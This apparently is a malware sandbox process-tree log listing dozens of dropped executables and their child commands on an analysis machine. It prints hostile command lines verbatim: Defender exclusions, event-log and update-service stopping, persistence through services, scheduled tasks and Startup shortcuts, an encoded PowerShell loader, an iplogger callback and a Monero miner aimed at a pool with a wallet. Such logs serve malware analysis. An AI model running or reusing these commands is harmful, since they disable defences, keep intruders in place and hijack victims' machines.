-
-
-
C:\Users\Admin\Desktop\a\serieta.exe"C:\Users\Admin\Desktop\a\serieta.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:6840 -
C:\Users\Admin\AppData\Local\Temp\natura.exe"C:\Users\Admin\AppData\Local\Temp\natura.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3524 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "HJUWGNAT"4⤵
- Launches sc.exe
PID:6824
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "HJUWGNAT" binpath= "C:\ProgramData\agmxykvocxft\etuamactyjne.exe" start= "auto"4⤵
- Launches sc.exe
PID:4440
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:5368
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "HJUWGNAT"4⤵
- Launches sc.exe
PID:4692
-
-
-
C:\Users\Admin\AppData\Local\Temp\nautr.exe"C:\Users\Admin\AppData\Local\Temp\nautr.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3216 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "OYGYWFTH"4⤵
- Launches sc.exe
PID:7048
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "OYGYWFTH" binpath= "C:\ProgramData\dnbdcucuyzqs\pseaptzkxyms.exe" start= "auto"4⤵
- Launches sc.exe
PID:3924
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:6772
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "OYGYWFTH"4⤵PID:6188
-
-
-
C:\Users\Admin\AppData\Local\Temp\Notepad.exe"C:\Users\Admin\AppData\Local\Temp\Notepad.exe"3⤵
- Executes dropped EXE
PID:3900 -
C:\Users\Admin\AppData\Local\Temp\Notepad.exe"C:\Users\Admin\AppData\Local\Temp\Notepad.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1124 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\activate.bat5⤵PID:7120
-
C:\Windows\system32\taskkill.exetaskkill /f /im "Notepad.exe"6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5136
-
-
C:\Users\Admin\Notepad.exe"Notepad.exe"6⤵
- Executes dropped EXE
PID:5324 -
C:\Users\Admin\Notepad.exe"Notepad.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:5280
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\a\0x3fg.exe"C:\Users\Admin\Desktop\a\0x3fg.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
PID:6952 -
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe"3⤵
- Executes dropped EXE
PID:1544 -
C:\Users\Admin\AppData\Roaming\1000001000\uYtF.exe"C:\Users\Admin\AppData\Roaming\1000001000\uYtF.exe"4⤵PID:7808
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Power Settings
PID:1936
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Power Settings
PID:5184
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Power Settings
PID:3080
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Power Settings
PID:6748
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵PID:6028
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "xjuumoinznsp"5⤵PID:468
-
-
-
-
-
C:\Users\Admin\Desktop\a\setup.exe"C:\Users\Admin\Desktop\a\setup.exe"2⤵
- Executes dropped EXE
PID:2924 -
C:\Users\Admin\AppData\Local\Temp\setup-95f1eaa636b0010d\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup-95f1eaa636b0010d\setup.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2444 -
C:\Windows\system32\winsvc.exe"C:\Windows\system32\winsvc.exe" "C:\Users\Admin\AppData\Local\Temp\setup-95f1eaa636b0010d\setup.exe"4⤵
- Executes dropped EXE
PID:1084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "create" "winsvc" "type=own" "start=auto" "error=ignore" "binPath=\"C:\Windows\system32\winsvc.exe\"" "DisplayName=\"Windows System Service\""5⤵
- Command and Scripting Interpreter: PowerShell
PID:5928 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" create winsvc type=own start=auto error=ignore binPath=C:\Windows\system32\winsvc.exe "DisplayName=Windows System Service"6⤵
- Launches sc.exe
PID:5160
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "failure" "winsvc" "reset=0" "actions=restart/0/restart/0/restart/0"5⤵
- Command and Scripting Interpreter: PowerShell
PID:4344 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" failure winsvc reset=0 actions=restart/0/restart/0/restart/06⤵
- Launches sc.exe
PID:6036
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "description" "winsvc" "\"Windows System Service is the main system supervision service.\""5⤵
- Command and Scripting Interpreter: PowerShell
PID:2764 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" description winsvc "Windows System Service is the main system supervision service."6⤵PID:2124
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "start" "winsvc"5⤵
- Command and Scripting Interpreter: PowerShell
PID:6804 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" start winsvc6⤵
- Launches sc.exe
PID:6364
-
-
-
-
-
-
C:\Users\Admin\Desktop\a\BuildTotale.exe"C:\Users\Admin\Desktop\a\BuildTotale.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:2628 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwBuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAaABjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAcQBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAYgBiACMAPgA="3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6112
-
-
C:\Users\Admin\AppData\Local\Temp\supportoxmr.exe"C:\Users\Admin\AppData\Local\Temp\supportoxmr.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:4640 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5412
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:4236
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:5340
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "ZODSAKKJ"4⤵
- Launches sc.exe
PID:6108
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "ZODSAKKJ" binpath= "C:\ProgramData\ytdcogcfuxoe\wsfekkbdzjcc.exe" start= "auto"4⤵
- Launches sc.exe
PID:6432
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:3636
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "ZODSAKKJ"4⤵
- Launches sc.exe
PID:4556
-
-
-
C:\Users\Admin\AppData\Local\Temp\etc test.exe"C:\Users\Admin\AppData\Local\Temp\etc test.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:3428 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6568
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:5860
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:5868
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "OBKZWAPS"4⤵
- Launches sc.exe
PID:5840
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "OBKZWAPS" binpath= "C:\ProgramData\rstywrmdprzs\esfowblknspo.exe" start= "auto"4⤵
- Launches sc.exe
PID:6016
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:2164
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "OBKZWAPS"4⤵
- Launches sc.exe
PID:6904
-
-
-
C:\Users\Admin\AppData\Local\Temp\Notepad.exe"C:\Users\Admin\AppData\Local\Temp\Notepad.exe"3⤵
- Executes dropped EXE
PID:6296 -
C:\Users\Admin\AppData\Local\Temp\Notepad.exe"C:\Users\Admin\AppData\Local\Temp\Notepad.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:6880
-
-
-
-
C:\Users\Admin\Desktop\a\taskweaker.exe"C:\Users\Admin\Desktop\a\taskweaker.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3628 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe3⤵PID:2444
-
-
-
C:\Users\Admin\Desktop\a\ama.exe"C:\Users\Admin\Desktop\a\ama.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:3708 -
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"3⤵
- Executes dropped EXE
PID:3220
-
-
C:\Users\Admin\AppData\Local\Temp\7.exe"C:\Users\Admin\AppData\Local\Temp\7.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
PID:6308 -
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4468
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.co/1lLub3⤵PID:6028
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x120,0x124,0xd4,0x128,0x7ffa84f646f8,0x7ffa84f64708,0x7ffa84f647184⤵PID:6032
-
-
-
-
C:\Users\Admin\Desktop\a\setup222.exe"C:\Users\Admin\Desktop\a\setup222.exe"2⤵
- Executes dropped EXE
PID:5240 -
C:\Users\Admin\Desktop\a\SetupWizard.exeSetupWizard.exe3⤵
- Executes dropped EXE
PID:3152 -
C:\Users\Admin\AppData\Local\Temp\SetupWizard-2def38ccf03da3c1\SetupWizard.exe"C:\Users\Admin\AppData\Local\Temp\SetupWizard-2def38ccf03da3c1\SetupWizard.exe"4⤵
- Executes dropped EXE
PID:7108
-
-
-
C:\Users\Admin\Desktop\a\SetupWizard.exeSetupWizard.exe3⤵PID:6344
-
-
-
C:\Users\Admin\Desktop\a\FirstZ.exe"C:\Users\Admin\Desktop\a\FirstZ.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:6240 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:6724 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2740
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:5896
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:5616
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:6456
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:4784
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:3900
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:180
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:4472
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:6784
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
PID:5604
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
PID:2232
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WSNKISKT"3⤵
- Launches sc.exe
PID:5540
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"3⤵PID:3540
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:5916
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WSNKISKT"3⤵
- Launches sc.exe
PID:964
-
-
-
C:\Users\Admin\Desktop\a\pic1.exe"C:\Users\Admin\Desktop\a\pic1.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:6052 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "3⤵PID:5532
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\rolex.exerolex.exe -priverdD4⤵
- Checks computer location settings
- Executes dropped EXE
PID:5236 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe"5⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
PID:6272 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 46⤵PID:7656
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 46⤵PID:7752
-
-
-
-
-
-
C:\Users\Admin\Desktop\a\svchost.exe"C:\Users\Admin\Desktop\a\svchost.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
PID:6840 -
C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"3⤵
- Executes dropped EXE
PID:3188 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3188 -s 5884⤵
- Program crash
PID:4996
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 10723⤵
- Program crash
PID:4784
-
-
-
C:\Users\Admin\Desktop\a\epitheliogeneticTFr.exe"C:\Users\Admin\Desktop\a\epitheliogeneticTFr.exe"2⤵
- Executes dropped EXE
PID:1196
-
-
C:\Users\Admin\Desktop\a\pic15.exe"C:\Users\Admin\Desktop\a\pic15.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:208 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe3⤵PID:4588
-
-
-
C:\Users\Admin\Desktop\a\limba.exe"C:\Users\Admin\Desktop\a\limba.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4984 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:7028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4328
-
-
-
C:\Users\Admin\Desktop\a\ChatLife.exe"C:\Users\Admin\Desktop\a\ChatLife.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5316 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Confirmed Confirmed.cmd & Confirmed.cmd3⤵PID:5620
-
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:3528
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"4⤵PID:5288
-
-
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:4964
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"4⤵PID:5556
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7683184⤵PID:2028
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "PhoneAbcSchedulesApr" Nbc4⤵PID:4704
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Challenged + Diy + Teachers + California + Mba + Yarn + Payable + Zdnet + Plumbing + Pe + Trick + Betting + Absence + Motorcycles + Man + Analyst + Max + Patrick + Pg + Exemption + Sight 768318\B4⤵PID:6596
-
-
C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif768318\Paraguay.pif 768318\B4⤵PID:5544
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & echo URL="C:\Users\Admin\AppData\Local\TradeInsight Technologies\TradeWise.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & exit5⤵PID:6816
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 54⤵
- Delays execution with timeout.exe
PID:3244
-
-
-
-
C:\Users\Admin\Desktop\a\1.exe"C:\Users\Admin\Desktop\a\1.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:1408 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 3523⤵
- Program crash
PID:864
-
-
-
C:\Users\Admin\Desktop\a\gui.exe"C:\Users\Admin\Desktop\a\gui.exe"2⤵
- Executes dropped EXE
PID:3080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Uhyggestemninger=Get-Content 'C:\Users\Admin\AppData\Local\Kbmandslivenes110\jesuitical\colourama\Blaze.Udk';$Unyieldingly=$Uhyggestemninger.SubString(54584,3);.$Unyieldingly($Uhyggestemninger)"3⤵
- Command and Scripting Interpreter: PowerShell
PID:3560
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463.exe"C:\Users\Admin\Desktop\4363463463464363463463463.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6316 -
C:\Users\Admin\Desktop\Files\DRIVEapplet.exe"C:\Users\Admin\Desktop\Files\DRIVEapplet.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:3936 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵
- Suspicious use of SetWindowsHookEx
PID:6904
-
-
-
C:\Users\Admin\Desktop\Files\gold.exe"C:\Users\Admin\Desktop\Files\gold.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3940 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:4820
-
-
-
C:\Users\Admin\Desktop\Files\%E7%9B%AE%E5%BD%95%E8%A1%A8%E6%A0%BC%E5%90%8D%E5%8D%956001.exe"C:\Users\Admin\Desktop\Files\%E7%9B%AE%E5%BD%95%E8%A1%A8%E6%A0%BC%E5%90%8D%E5%8D%956001.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5256
-
-
C:\Users\Admin\Desktop\Files\look.exe"C:\Users\Admin\Desktop\Files\look.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5476 -
C:\Users\Admin\Desktop\Files\look.exe"C:\Users\Admin\Desktop\Files\look.exe"3⤵
- Executes dropped EXE
PID:6548
-
-
-
C:\Users\Admin\Desktop\Files\cleaner.exe"C:\Users\Admin\Desktop\Files\cleaner.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:2208 -
C:\Users\Admin\AppData\Roaming\ccleanerfile.exe"C:\Users\Admin\AppData\Roaming\ccleanerfile.exe"3⤵
- Executes dropped EXE
PID:2052
-
-
C:\Users\Admin\AppData\Roaming\XClient.exe"C:\Users\Admin\AppData\Roaming\XClient.exe"3⤵
- Executes dropped EXE
PID:5908
-
-
-
C:\Users\Admin\Desktop\Files\AAQ.exe"C:\Users\Admin\Desktop\Files\AAQ.exe"2⤵PID:2764
-
C:\Windows\SysWOW64\svchost.exe"C:\Users\Admin\Desktop\Files\AAQ.exe"3⤵PID:6300
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6300 -s 8124⤵
- Program crash
PID:4048
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6300 -s 8564⤵
- Program crash
PID:4612
-
-
-
-
C:\Users\Admin\Desktop\Files\ghjk.exe"C:\Users\Admin\Desktop\Files\ghjk.exe"2⤵PID:6216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 9123⤵
- Program crash
PID:3400
-
-
-
C:\Users\Admin\Desktop\Files\luma22222.exe"C:\Users\Admin\Desktop\Files\luma22222.exe"2⤵PID:4968
-
-
C:\Users\Admin\Desktop\Files\Zinker.exe"C:\Users\Admin\Desktop\Files\Zinker.exe"2⤵PID:4276
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3528
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:2032
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:6984
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:1940
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3500
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 HR" /sc HOURLY /rl HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:1408
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 LG" /sc ONLOGON /rl HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:3860
-
-
-
-
C:\Users\Admin\Desktop\Files\time2time.exe"C:\Users\Admin\Desktop\Files\time2time.exe"2⤵PID:5472
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\Files\time2time.exe" -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:6928
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"3⤵PID:7136
-
-
-
C:\Users\Admin\Desktop\Files\nine.exe"C:\Users\Admin\Desktop\Files\nine.exe"2⤵PID:4596
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "nine.exe" /f & erase "C:\Users\Admin\Desktop\Files\nine.exe" & exit3⤵PID:3744
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 16243⤵
- Program crash
PID:2328
-
-
-
C:\Users\Admin\Desktop\Files\cp.exe"C:\Users\Admin\Desktop\Files\cp.exe"2⤵PID:7052
-
-
C:\Users\Admin\Desktop\Files\cctv2xiaobao.exe"C:\Users\Admin\Desktop\Files\cctv2xiaobao.exe"2⤵PID:1032
-
-
C:\Users\Admin\Desktop\Files\asdfg.exe"C:\Users\Admin\Desktop\Files\asdfg.exe"2⤵PID:6784
-
C:\Users\Admin\AppData\Local\Temp\BLueHvffhw.exe"C:\Users\Admin\AppData\Local\Temp\BLueHvffhw.exe"3⤵PID:2616
-
C:\Users\Admin\AppData\Local\Temp\BLueHvffhw.exe"C:\Users\Admin\AppData\Local\Temp\BLueHvffhw.exe"4⤵PID:764
-
-
-
C:\Users\Admin\Desktop\Files\asdfg.exe"C:\Users\Admin\Desktop\Files\asdfg.exe"3⤵PID:4580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 8884⤵
- Program crash
PID:4376
-
-
-
-
C:\Users\Admin\Desktop\Files\Unusoke_LetThereBeNightingale.exe"C:\Users\Admin\Desktop\Files\Unusoke_LetThereBeNightingale.exe"2⤵PID:5160
-
-
C:\Users\Admin\Desktop\Files\vpn-1002.exe"C:\Users\Admin\Desktop\Files\vpn-1002.exe"2⤵PID:5788
-
